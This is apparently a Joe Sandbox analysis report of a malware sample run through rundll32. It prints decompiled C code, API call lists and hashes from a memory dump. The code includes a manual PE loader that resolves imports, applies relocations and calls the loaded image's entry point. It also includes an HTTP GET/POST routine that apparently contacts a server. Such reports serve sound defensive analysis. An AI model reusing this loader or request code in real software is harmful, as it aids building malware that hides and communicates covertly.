                                                                      0x0494d832
                                                                      0x00000000
                                                                      0x0494d832
                                                                      0x0494daf2
                                                                      0x00000000
                                                                      0x0494d775
                                                                      0x0494d77a
                                                                      0x0494d77f
                                                                      0x00000000
                                                                      0x0494d783

                                                                      APIs
                                                                        • Part of subcall function 0494D213: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D226
                                                                        • Part of subcall function 0494D213: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D237
                                                                        • Part of subcall function 0494D213: CoCreateInstance.OLE32(0495D848,00000000,00000001,0495D858,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D24E
                                                                        • Part of subcall function 0494D213: SysAllocString.OLEAUT32(00000000), ref: 0494D259
                                                                        • Part of subcall function 0494D213: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D284
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0494D790
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0494D7A4
                                                                      • SysFreeString.OLEAUT32(?), ref: 0494DB2D
                                                                      • SysFreeString.OLEAUT32(?), ref: 0494DB36
                                                                        • Part of subcall function 0494913B: HeapFree.KERNEL32(00000000,00000000), ref: 04949181
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: String$AllocFree$Initialize$BlanketCreateHeapInstanceProxySecurity
                                                                      • String ID: FALSE$TRUE
                                                                      • API String ID: 318989454-1412513891
                                                                      • Opcode ID: 104ca730e1858a121d9e49b5c619e7c4aa2800eb557c0f8ca6802aa0c5e3a7e9
                                                                      • Instruction ID: b11d316214c5d17a7d1df961e11ee360d8d0f34ad582410c7ada6e75a3eef6f1
                                                                      • Opcode Fuzzy Hash: 104ca730e1858a121d9e49b5c619e7c4aa2800eb557c0f8ca6802aa0c5e3a7e9
                                                                      • Instruction Fuzzy Hash: 3DE13DB5A00219AFDF14DFE4C898EAEBBB9FFC9304F104669E505A7284DB75B901CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 30%
                                                                      			E04953175(intOrPtr* _a4) {
                                                                      				signed int _v8;
                                                                      				_Unknown_base(*)()* _v12;
                                                                      				char _v16;
                                                                      				_Unknown_base(*)()* _t15;
                                                                      				void* _t20;
                                                                      				intOrPtr* _t25;
                                                                      				intOrPtr* _t29;
                                                                      				struct HINSTANCE__* _t30;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                      				if(_t30 == 0) {
                                                                      					L7:
                                                                      					return 1;
                                                                      				}
                                                                      				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                      				if(_t25 == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                      				_v12 = _t15;
                                                                      				if(_t15 == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                      				if(_t29 == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				_push(0xf0000000);
                                                                      				_push(1);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push( &_v8);
                                                                      				if( *_t25() == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				_t20 = _v12(_v8, 4,  &_v16);
                                                                      				 *_t29(_v8, 0);
                                                                      				if(_t20 == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				 *_a4 = E049530D0( &_v16);
                                                                      				return 0;
                                                                      			}












                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,?,0494818C,00000000), ref: 04953187
                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0495319F
                                                                      • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 049531AD
                                                                      • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 049531BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                      • API String ID: 667068680-129414566
                                                                      • Opcode ID: 85da492e44f41ff98205f1cfb0b5c37e549e3106d68781cbae17604e7b8b1ca3
                                                                      • Instruction ID: 66f9e8c1a1929da2e700770904c038edb84f62c73f2156eaf5ec140074a2ed25
                                                                      • Opcode Fuzzy Hash: 85da492e44f41ff98205f1cfb0b5c37e549e3106d68781cbae17604e7b8b1ca3
                                                                      • Instruction Fuzzy Hash: F811A932A44719B7DB31D6B4AC45F9EBBAC9F44790F310175ED00E7150EB71EA048B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E0494F03B(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				char _v16;
                                                                      				char _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				char _v32;
                                                                      				intOrPtr _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr _v60;
                                                                      				char _v64;
                                                                      				int _v76;
                                                                      				void* _v80;
                                                                      				intOrPtr _v100;
                                                                      				int _v104;
                                                                      				void* _v108;
                                                                      				intOrPtr _v112;
                                                                      				intOrPtr _v116;
                                                                      				char* _v120;
                                                                      				char _v124;
                                                                      				char _v140;
                                                                      				void _v396;
                                                                      				void _v652;
                                                                      				intOrPtr _t91;
                                                                      				intOrPtr _t99;
                                                                      				intOrPtr* _t101;
                                                                      				intOrPtr _t106;
                                                                      				signed int _t107;
                                                                      				void* _t108;
                                                                      				intOrPtr _t109;
                                                                      				signed int _t110;
                                                                      				intOrPtr _t112;
                                                                      				char _t114;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t126;
                                                                      				intOrPtr _t130;
                                                                      				intOrPtr _t134;
                                                                      				intOrPtr _t136;
                                                                      				intOrPtr _t138;
                                                                      				char _t142;
                                                                      				intOrPtr _t144;
                                                                      				void* _t154;
                                                                      				signed int _t156;
                                                                      				intOrPtr _t162;
                                                                      				intOrPtr _t167;
                                                                      				signed int _t168;
                                                                      				signed int _t176;
                                                                      				char _t182;
                                                                      				signed int _t183;
                                                                      				void* _t184;
                                                                      				signed int _t186;
                                                                      				signed int _t187;
                                                                      				signed int _t188;
                                                                      				char _t189;
                                                                      				void* _t190;
                                                                      				void* _t191;
                                                                      				intOrPtr* _t193;
                                                                      
                                                                      				_t157 = __ecx;
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				_t184 = __edx;
                                                                      				_v24 = __ecx;
                                                                      				_v32 = 4;
                                                                      				_v36 = 1;
                                                                      				memset( &_v396, 0, 0x100);
                                                                      				memset( &_v652, 0, 0x100);
                                                                      				_t193 = _t191 + 0x18;
                                                                      				_v64 = E049490CA(_t157, 0x503);
                                                                      				 *_t193 = 0x14ee;
                                                                      				_v60 = E049490CA(_t157);
                                                                      				 *_t193 = 0x18a;
                                                                      				_v56 = E049490CA(_t157);
                                                                      				 *_t193 = 0x128f;
                                                                      				_v52 = E049490CA(_t157);
                                                                      				 *_t193 = 0xe8b;
                                                                      				_t91 = E049490CA(_t157);
                                                                      				_v44 = _v44 & 0;
                                                                      				_t182 = 0x3c;
                                                                      				_v48 = _t91;
                                                                      				E049492A2( &_v124, 0, 0x100);
                                                                      				_v116 = 0x10;
                                                                      				_v120 =  &_v140;
                                                                      				_v124 = _t182;
                                                                      				_v108 =  &_v396;
                                                                      				_v104 = 0x100;
                                                                      				_v80 =  &_v652;
                                                                      				_push( &_v124);
                                                                      				_push(0);
                                                                      				_v76 = 0x100;
                                                                      				_push(E0494CE25(_t184));
                                                                      				_t99 =  *0x4960fb8; // 0x0
                                                                      				_push(_t184);
                                                                      				if( *((intOrPtr*)(_t99 + 0x28))() != 0) {
                                                                      					_t176 = 0;
                                                                      					__eflags = 0;
                                                                      					_v28 = 0;
                                                                      					do {
                                                                      						_t101 =  *0x4960fb8; // 0x0
                                                                      						_v12 = 0x8404f700;
                                                                      						_t183 =  *_t101( *0x49610c8,  *((intOrPtr*)(_t190 + _t176 * 4 - 0x24)), 0, 0, 0);
                                                                      						__eflags = _t183;
                                                                      						if(_t183 != 0) {
                                                                      							E0494EFD3(_t183);
                                                                      							_t106 =  *0x4960fb8; // 0x0
                                                                      							_t107 =  *((intOrPtr*)(_t106 + 0x1c))(_t183,  &_v396, _v100, 0, 0, 3, 0, 0);
                                                                      							__eflags = _a24;
                                                                      							_t156 = _t107;
                                                                      							if(_a24 != 0) {
                                                                      								E0494C2D1(_a24);
                                                                      							}
                                                                      							__eflags = _t156;
                                                                      							if(_t156 != 0) {
                                                                      								__eflags = _v112 - 4;
                                                                      								_t162 = 0x8484f700;
                                                                      								if(_v112 != 4) {
                                                                      									_t162 = _v12;
                                                                      								}
                                                                      								__eflags = _v24 - 2;
                                                                      								_t108 = 0x495df0c;
                                                                      								if(_v24 != 2) {
                                                                      									_t108 = 0x495df14;
                                                                      								}
                                                                      								_t164 =  &_v652;
                                                                      								_t109 =  *0x4960fb8; // 0x0
                                                                      								_t110 =  *((intOrPtr*)(_t109 + 0x20))(_t156, _t108,  &_v652, 0, 0,  &_v64, _t162, 0);
                                                                      								__eflags = _a24;
                                                                      								_t186 = _t110;
                                                                      								_v8 = _t186;
                                                                      								if(_a24 != 0) {
                                                                      									_t164 = _a24;
                                                                      									E0494C2D1(_a24);
                                                                      								}
                                                                      								__eflags = _t186;
                                                                      								if(_t186 != 0) {
                                                                      									__eflags = _v112 - 4;
                                                                      									if(_v112 == 4) {
                                                                      										_t164 = _t186;
                                                                      										E0494EF81(_t186);
                                                                      									}
                                                                      									__eflags = _v24 - 2;
                                                                      									if(_v24 != 2) {
                                                                      										__eflags = 0;
                                                                      										_t112 =  *0x4960fb8; // 0x0
                                                                      										_v12 =  *((intOrPtr*)(_t112 + 0x24))(_t186, 0, 0, 0, 0);
                                                                      									} else {
                                                                      										_t142 = E049490CA(_t164, 0xfb3);
                                                                      										_t189 = _t142;
                                                                      										_v16 = _t189;
                                                                      										_t144 =  *0x4960fb8; // 0x0
                                                                      										_t186 = _v8;
                                                                      										_v12 =  *((intOrPtr*)(_t144 + 0x24))(_t186, _t189, E0494CE25(_t189), _a4, _a8);
                                                                      										E04949D4C( &_v16);
                                                                      									}
                                                                      									__eflags = _a24;
                                                                      									if(_a24 != 0) {
                                                                      										E0494C2D1(_a24);
                                                                      									}
                                                                      									__eflags = _v12;
                                                                      									if(_v12 != 0) {
                                                                      										L31:
                                                                      										_t114 = 8;
                                                                      										_v32 = _t114;
                                                                      										_v20 = 0;
                                                                      										_v16 = 0;
                                                                      										E049492A2( &_v20, 0, _t114);
                                                                      										_t119 =  *0x4960fb8; // 0x0
                                                                      										__eflags =  *((intOrPtr*)(_t119 + 0xc))(_t186, 0x13,  &_v20,  &_v32, 0);
                                                                      										if(__eflags != 0) {
                                                                      											_t187 = E0494C1E4( &_v20, __eflags);
                                                                      											__eflags = _t187 - 0xc8;
                                                                      											if(_t187 == 0xc8) {
                                                                      												 *_a20 = _v8;
                                                                      												 *_a12 = _t183;
                                                                      												 *_a16 = _t156;
                                                                      												__eflags = 0;
                                                                      												return 0;
                                                                      											}
                                                                      											_t188 =  ~_t187;
                                                                      											L35:
                                                                      											_t126 =  *0x4960fb8; // 0x0
                                                                      											 *((intOrPtr*)(_t126 + 8))(_v8);
                                                                      											L36:
                                                                      											__eflags = _t156;
                                                                      											if(_t156 != 0) {
                                                                      												_t130 =  *0x4960fb8; // 0x0
                                                                      												 *((intOrPtr*)(_t130 + 8))(_t156);
                                                                      											}
                                                                      											__eflags = _t183;
                                                                      											if(_t183 != 0) {
                                                                      												_t167 =  *0x4960fb8; // 0x0
                                                                      												 *((intOrPtr*)(_t167 + 8))(_t183);
                                                                      											}
                                                                      											return _t188;
                                                                      										}
                                                                      										GetLastError();
                                                                      										_t188 = 0xfffffff8;
                                                                      										goto L35;
                                                                      									} else {
                                                                      										GetLastError();
                                                                      										_t134 =  *0x4960fb8; // 0x0
                                                                      										 *((intOrPtr*)(_t134 + 8))(_t186);
                                                                      										_t186 = 0;
                                                                      										__eflags = 0;
                                                                      										goto L26;
                                                                      									}
                                                                      								} else {
                                                                      									GetLastError();
                                                                      									L26:
                                                                      									_t136 =  *0x4960fb8; // 0x0
                                                                      									 *((intOrPtr*)(_t136 + 8))(_t156);
                                                                      									_t156 = 0;
                                                                      									__eflags = 0;
                                                                      									goto L27;
                                                                      								}
                                                                      							} else {
                                                                      								GetLastError();
                                                                      								L27:
                                                                      								_t138 =  *0x4960fb8; // 0x0
                                                                      								 *((intOrPtr*)(_t138 + 8))(_t183);
                                                                      								_t183 = 0;
                                                                      								__eflags = 0;
                                                                      								goto L28;
                                                                      							}
                                                                      						}
                                                                      						GetLastError();
                                                                      						L28:
                                                                      						_t168 = _t186;
                                                                      						_t176 = _v28 + 1;
                                                                      						_v28 = _t176;
                                                                      						__eflags = _t176 - 2;
                                                                      					} while (_t176 < 2);
                                                                      					_v8 = _t186;
                                                                      					__eflags = _t168;
                                                                      					if(_t168 != 0) {
                                                                      						goto L31;
                                                                      					}
                                                                      					_t188 = 0xfffffffe;
                                                                      					goto L36;
                                                                      				}
                                                                      				_t154 = 0xfffffffc;
                                                                      				return _t154;
                                                                      			}
                                                                      0x0494f329
                                                                      0x0494f32f
                                                                      0x0494f32f
                                                                      0x0494f332
                                                                      0x0494f334
                                                                      0x0494f336
                                                                      0x0494f33d
                                                                      0x0494f33d
                                                                      0x00000000
                                                                      0x0494f340
                                                                      0x0494f2fa
                                                                      0x0494f302
                                                                      0x00000000
                                                                      0x0494f27e
                                                                      0x0494f27e
                                                                      0x0494f284
                                                                      0x0494f28a
                                                                      0x0494f28d
                                                                      0x0494f28d
                                                                      0x00000000
                                                                      0x0494f28d
                                                                      0x0494f200
                                                                      0x0494f200
                                                                      0x0494f28f
                                                                      0x0494f28f
                                                                      0x0494f295
                                                                      0x0494f298
                                                                      0x0494f298
                                                                      0x00000000
                                                                      0x0494f298
                                                                      0x0494f1a5
                                                                      0x0494f1a5
                                                                      0x0494f29a
                                                                      0x0494f29a
                                                                      0x0494f2a0
                                                                      0x0494f2a3
                                                                      0x0494f2a3
                                                                      0x00000000
                                                                      0x0494f2a3
                                                                      0x0494f1a3
                                                                      0x0494f164
                                                                      0x0494f2a5
                                                                      0x0494f2a8
                                                                      0x0494f2aa
                                                                      0x0494f2ad
                                                                      0x0494f2b0
                                                                      0x0494f2b0
                                                                      0x0494f2b9
                                                                      0x0494f2bc
                                                                      0x0494f2be
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494f2c2
                                                                      0x00000000
                                                                      0x0494f2c2
                                                                      0x0494f133
                                                                      0x00000000

                                                                      APIs
                                                                      • memset.MSVCRT ref: 0494F070
                                                                      • memset.MSVCRT ref: 0494F081
                                                                        • Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0494F164
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ErrorLast
                                                                      • String ID: GET$POST
                                                                      • API String ID: 2570506013-3192705859
                                                                      • Opcode ID: 80017aa4eefa84ffdfeba40915a1460153c339acb858cbd5e5e5a71203bbc4c2
                                                                      • Instruction ID: b4d9586662c4fcaf91491938e4c29b1f34b0421b150c82de472e3784c1f50e1d
                                                                      • Opcode Fuzzy Hash: 80017aa4eefa84ffdfeba40915a1460153c339acb858cbd5e5e5a71203bbc4c2
                                                                      • Instruction Fuzzy Hash: F3A13EB1900219AFEB54DFA4D884EAEBBB9EF88314F108179E515E7290DB74AD41CF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _snprintfqsort
                                                                      • String ID: %I64d$false$null$true
                                                                      • API String ID: 756996078-4285102228
                                                                      • Opcode ID: 51fe04ca20614e680997fe2d3cde8b79793953148360f0f2ae966d212bfdc661
                                                                      • Instruction ID: 840d90d88f07885b382febde20bc29e041df92f91cdd571155f3a2efe9527c5c
                                                                      • Opcode Fuzzy Hash: 51fe04ca20614e680997fe2d3cde8b79793953148360f0f2ae966d212bfdc661
                                                                      • Instruction Fuzzy Hash: 82E14A7190020ABBEF11EF64DC86FAB3B7DEF84344F204479FD1596160E675AA618BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E04954646(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                      				signed int _v5;
                                                                      				signed short _v12;
                                                                      				intOrPtr* _v16;
                                                                      				intOrPtr _v20;
                                                                      				signed int* _v24;
                                                                      				unsigned int _v28;
                                                                      				signed short* _v32;
                                                                      				struct HINSTANCE__* _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				intOrPtr* _v48;
                                                                      				signed short* _v52;
                                                                      				intOrPtr _v56;
                                                                      				unsigned int _v60;
                                                                      				intOrPtr _v64;
                                                                      				_Unknown_base(*)()* _v68;
                                                                      				signed int _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				unsigned int _v88;
                                                                      				intOrPtr _v92;
                                                                      				signed int _v96;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				intOrPtr _v112;
                                                                      				CHAR* _v116;
                                                                      				signed int _v120;
                                                                      				intOrPtr _v124;
                                                                      				signed int _v128;
                                                                      				signed int _v132;
                                                                      				signed int _t220;
                                                                      				signed int _t237;
                                                                      				void* _t277;
                                                                      				signed int _t282;
                                                                      				signed int _t284;
                                                                      				intOrPtr _t324;
                                                                      
                                                                      				_v44 = _v44 & 0x00000000;
                                                                      				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                      				_v20 = _v84;
                                                                      				_t324 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                      				_v64 = _t324;
                                                                      				if(_t324 == 0) {
                                                                      					L13:
                                                                      					while(0 != 0) {
                                                                      					}
                                                                      					_push(8);
                                                                      					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                      						L35:
                                                                      						if(_a16 == 0) {
                                                                      							L54:
                                                                      							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							if(_a12 != 0) {
                                                                      								 *_a12 = _v80;
                                                                      							}
                                                                      							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                      							E049543F4(GetCurrentProcess(),  *0x4960fe4, _t203, _a4, _a4);
                                                                      							_v124 = _v80(_a4, 1, _a8);
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							if(_v124 != 0) {
                                                                      								if(_v44 == 0) {
                                                                      									L77:
                                                                      									return 1;
                                                                      								}
                                                                      								if(_a20 != 1) {
                                                                      									if(_a20 != 2) {
                                                                      										L75:
                                                                      										while(0 != 0) {
                                                                      										}
                                                                      										goto L77;
                                                                      									}
                                                                      									while(0 != 0) {
                                                                      									}
                                                                      									_v132 = _v44;
                                                                      									goto L75;
                                                                      								}
                                                                      								while(0 != 0) {
                                                                      								}
                                                                      								_v44();
                                                                      								goto L75;
                                                                      							}
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							return 0;
                                                                      						}
                                                                      						while(0 != 0) {
                                                                      						}
                                                                      						_push(8);
                                                                      						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                      							goto L54;
                                                                      						}
                                                                      						_v128 = 0x80000000;
                                                                      						_t220 = 8;
                                                                      						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t220 * 0));
                                                                      						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                      						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                      						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                      						while(0 != 0) {
                                                                      						}
                                                                      						_v40 = _v40 & 0x00000000;
                                                                      						while(_v40 < _v104) {
                                                                      							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                      							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                      							if(lstrcmpA(_v116, _a16) != 0) {
                                                                      								_v40 = _v40 + 1;
                                                                      								continue;
                                                                      							}
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							_v44 = _v120;
                                                                      							break;
                                                                      						}
                                                                      						if(_v44 != 0) {
                                                                      							goto L54;
                                                                      						}
                                                                      						while(0 != 0) {
                                                                      						}
                                                                      						return 0xffffffff;
                                                                      					}
                                                                      					_v96 = 0x80000000;
                                                                      					_t237 = 8;
                                                                      					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t237 << 0) + 0x78));
                                                                      					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                      						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                      						if(_v36 == 0) {
                                                                      							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                      						}
                                                                      						if(_v36 != 0) {
                                                                      							if( *_v16 == 0) {
                                                                      								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                      							} else {
                                                                      								_v24 =  *_v16 + _a4;
                                                                      							}
                                                                      							_v72 = _v72 & 0x00000000;
                                                                      							while( *_v24 != 0) {
                                                                      								if(( *_v24 & _v96) == 0) {
                                                                      									_v100 =  *_v24 + _a4;
                                                                      									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                      								} else {
                                                                      									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                      								}
                                                                      								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                      									 *_v24 = _v68;
                                                                      								} else {
                                                                      									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                      								}
                                                                      								_v24 =  &(_v24[1]);
                                                                      								_v72 = _v72 + 4;
                                                                      							}
                                                                      							_v16 = _v16 + 0x14;
                                                                      							continue;
                                                                      						} else {
                                                                      							_t277 = 0xfffffffd;
                                                                      							return _t277;
                                                                      						}
                                                                      					}
                                                                      					goto L35;
                                                                      				}
                                                                      				_t282 = 8;
                                                                      				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t282 * 5));
                                                                      				_t284 = 8;
                                                                      				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t284 * 5));
                                                                      				while(0 != 0) {
                                                                      				}
                                                                      				while(_v56 > 0) {
                                                                      					_v28 = _v52[2];
                                                                      					_v56 = _v56 - _v28;
                                                                      					_v28 = _v28 - 8;
                                                                      					_v28 = _v28 >> 1;
                                                                      					_v32 =  &(_v52[4]);
                                                                      					_v92 = _a4 +  *_v52;
                                                                      					_v60 = _v28;
                                                                      					while(1) {
                                                                      						_v88 = _v60;
                                                                      						_v60 = _v60 - 1;
                                                                      						if(_v88 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                      						_v12 =  *_v32 & 0xfff;
                                                                      						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                      						if((_v5 & 0x000000ff) != 3) {
                                                                      							if((_v5 & 0x000000ff) == 0xa) {
                                                                      								 *_v48 =  *_v48 + _v64;
                                                                      							}
                                                                      						} else {
                                                                      							 *_v48 =  *_v48 + _v64;
                                                                      						}
                                                                      						_v32 =  &(_v32[1]);
                                                                      					}
                                                                      					_v52 = _v32;
                                                                      				}
                                                                      				goto L13;
                                                                      			}


                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 049547AD
                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 049547C6
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 04954822
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 04954841
                                                                      • lstrcmpA.KERNEL32(?,00000000), ref: 04954932
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0495498F
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CurrentHandleLibraryLoadModuleProcesslstrcmp
                                                                      • String ID:
                                                                      • API String ID: 2598995400-0
                                                                      • Opcode ID: 67320c67cde3e5274d8823e49bdbae8026716618043c17a0e48217e47673f805
                                                                      • Instruction ID: 48b9283a0b63f90ab90b6e275ba4b9327b79da3b9ca9fe1b4dacf1dea5a22ee8
                                                                      • Opcode Fuzzy Hash: 67320c67cde3e5274d8823e49bdbae8026716618043c17a0e48217e47673f805
                                                                      • Instruction Fuzzy Hash: 6FE1BF75A00209DFCB94CFA8C891BADBBB5FF48314F248569E915AB360D734A981CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0494D307
                                                                      • SysAllocString.OLEAUT32(?), ref: 0494D30F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0494D323
                                                                      • SysFreeString.OLEAUT32(?), ref: 0494D39E
                                                                      • SysFreeString.OLEAUT32(?), ref: 0494D3A1
                                                                      • SysFreeString.OLEAUT32(?), ref: 0494D3A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
